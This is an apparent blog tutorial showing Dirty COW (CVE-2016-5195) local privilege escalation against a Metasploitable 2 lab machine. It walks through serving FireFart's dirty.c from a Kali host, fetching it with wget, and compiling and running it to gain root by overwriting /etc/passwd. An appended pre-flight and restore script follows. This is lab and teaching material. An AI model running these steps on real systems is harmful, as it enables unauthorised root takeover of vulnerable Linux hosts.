Privilege Escalation: Dirty COW Vulnerability

DISCLAIMER!
This content is intended solely for educational and ethical purposes. The tested IP addresses revealed here belong to machines set up by me, and this activity was conducted with permission. All cybersecurity activities must comply with the applicable regulations. The author (me) is not responsible for any misuse or illegal activity performed using the knowledge shared here. Any actions taken by readers using this information are at the reader's own risk.

From the previous post, we know that exploitation can be remote or local. Today, we will look at one of the best-known vulnerabilities used for local exploitation (to gain root privileges): Dirty COW (Copy-On-Write).

Image source: https://en.wikipedia.org/wiki/Dirty_COW

Dirty COW is a vulnerability in the Linux kernel, tracked as CVE-2016-5195, that affected every Linux-based OS running a kernel from 2.6.22 (2007) up to the fixed releases of October 2016 (4.8.3, 4.7.9 and 4.4.26 in mainline; distributions backported the fix to their own kernel packages). It is a race condition in the copy-on-write (COW) handling of the kernel's memory management subsystem: a write to a private, read-only mapping of a file is supposed to land in a private copy of the page, but by racing that write (through /proc/self/mem or ptrace) against madvise(MADV_DONTNEED) on the same mapping, an attacker can make it land on the original page-cache page, modifying a file they are only allowed to read (for example /etc/passwd or a setuid binary). The result is local privilege escalation: an unprivileged local user who can run code on the machine can become root.

First, we need a shell on the target (obtained, for example, through the vsftpd backdoor or another remote vulnerability). For this practice, I will use a shell on Metasploitable 2 directly, assuming that I already have low-privileged access to the target system. Metasploitable 2 runs Ubuntu 8.04 with a 2.6.24 kernel, well inside the vulnerable range. Our Kali Linux IP is 192.168.1.8.


Exploitation Steps

First, on our Kali Linux, get the dirty.c exploit source with git clone https://github.com/FireFart/dirtycow.git. The file lands in the cloned dirtycow directory, so change into it (cd dirtycow) before starting the web server in the next step.

After that, start an HTTP server to share the file with the target by running python3 -m http.server 8000 inside the cloned directory. The file is now reachable at http://<kali IP>:8000/dirty.c. In the server log we can see 192.168.1.7 (the target IP) requesting dirty.c from our Kali Linux as soon as we fetch it from the target.

Before fetching the script on the target, check that the target can reach our Kali machine by typing ping <kali IP>.

If that works, fetch dirty.c from our Kali Linux with wget http://<kali IP>:8000/dirty.c.

After the download succeeds, we compile and run the exploit with these commands:

gcc -pthread dirty.c -lcrypt -o cowroot (compile the C source file dirty.c with gcc; -pthread links the POSIX thread library, which the exploit needs because it races a second thread against the write; -lcrypt links libcrypt, which the exploit uses to generate the password hash for the new /etc/passwd entry; -o cowroot names the output binary cowroot, with no extension, since this is a Linux ELF binary, not a Windows .exe)

chmod +x cowroot (makes cowroot executable; gcc already sets the executable bit on its output, so this step is harmless but not strictly needed)

./cowroot (runs cowroot from the current directory)

The exploit asks for a new password. It backs up /etc/passwd to /tmp/passwd.bak, then uses the COW race to overwrite the root line of /etc/passwd with an entry for a user named firefart that has UID 0 and the password hash we just chose. We can then switch to that user (for example with su firefart) and explore the system with escalated privileges.

Now, we can see that logging in as the new user firefart gives us root. The picture below shows that at first we are still a normal user (indicated by the $ prompt), but after we log in as firefart, we have root privileges (indicated by the # prompt). Do not skip the restore step that the exploit itself prints: the original root entry is overwritten until /tmp/passwd.bak is moved back to /etc/passwd, so restore it once you are done, or the real root account on the box stops working.
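Before running the exploit as described above, and again after it, a few checks are worth having at hand on the target. The following script is an added example; it is not part of the original post or of FireFart's repository. The kernel versions it encodes are the October 2016 mainline releases that shipped the fix, the paths /tmp/passwd.bak and /etc/passwd are the ones dirty.c uses, and the function names and the "likely vulnerable" heuristic are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the original post or FireFart's dirtycow repository):
# pre-flight checks to run on the target before compiling dirty.c, plus a
# guarded restore of /etc/passwd for afterwards. Distributions backport fixes
# without changing the version string, so a "vulnerable" verdict here is a
# hint, not proof. Running the exploit is the real test.

# likely_vulnerable KVER: exit 0 if KVER (as printed by uname -r) predates the
# CVE-2016-5195 fix in its own series, exit 1 otherwise.
likely_vulnerable() {
    # keep only the leading dotted numbers: "2.6.24-16-server" -> "2.6.24"
    v=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
    set -- $(printf '%s' "$v" | tr '.' ' ')
    maj=${1:-0}; min=${2:-0}; pat=${3:-0}
    num=$((maj * 1000000 + min * 1000 + pat))
    # the bug was introduced in 2.6.22; 4.9 and later were released fixed
    if [ "$num" -lt 2006022 ] || [ "$num" -ge 4009000 ]; then
        return 1
    fi
    # mainline stable releases of October 2016 that carried the fix
    case "$maj.$min" in
        4.8) fix=3 ;;
        4.7) fix=9 ;;
        4.4) fix=26 ;;
        *)   fix=999999 ;;   # no mainline fix in this series: assume vulnerable
    esac
    if [ "$pat" -ge "$fix" ]; then
        return 1
    fi
    return 0
}

# preflight: report what matters for dirty.c on this host (run it on the target).
preflight() {
    kver=$(uname -r)
    echo "kernel $kver"
    if likely_vulnerable "$kver"; then
        echo "  predates the fix in its series: worth trying (unless the distro backported it)"
    else
        echo "  carries the fix: dirty.c will not work here"
    fi
    if command -v gcc >/dev/null 2>&1; then
        echo "gcc present: dirty.c can be compiled on the target"
    else
        echo "gcc missing: build on a machine with a matching libc (or statically) and copy the binary"
    fi
    # dirty.c writes its backup to /tmp/passwd.bak; a leftover from an earlier
    # run may be the only clean copy and must not be overwritten blindly
    if [ -e /tmp/passwd.bak ]; then
        echo "/tmp/passwd.bak already exists: inspect it before running the exploit again"
    fi
}

# restore_passwd BACKUP TARGET: put the backed-up passwd back, refusing if the
# backup is missing or has no root entry. Paths are parameters so the routine
# can be rehearsed on copies; on the target, as root (after su firefart), it is:
#   restore_passwd /tmp/passwd.bak /etc/passwd
restore_passwd() {
    backup=$1; target=$2
    [ -s "$backup" ] || { echo "no backup at $backup" >&2; return 1; }
    grep -q '^root:' "$backup" || { echo "$backup has no root entry, refusing" >&2; return 1; }
    cp "$backup" "$target" && echo "restored $target from $backup"
}

preflight
```

Run it on the target before the wget/gcc steps; once you are done as firefart, call restore_passwd /tmp/passwd.bak /etc/passwd. The version check deliberately errs toward "vulnerable" for 3.x series and for distribution kernels, since an Ubuntu 4.4.0-NN or a RHEL 3.10.0-NNN package can carry the fix while still reporting the old version string.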
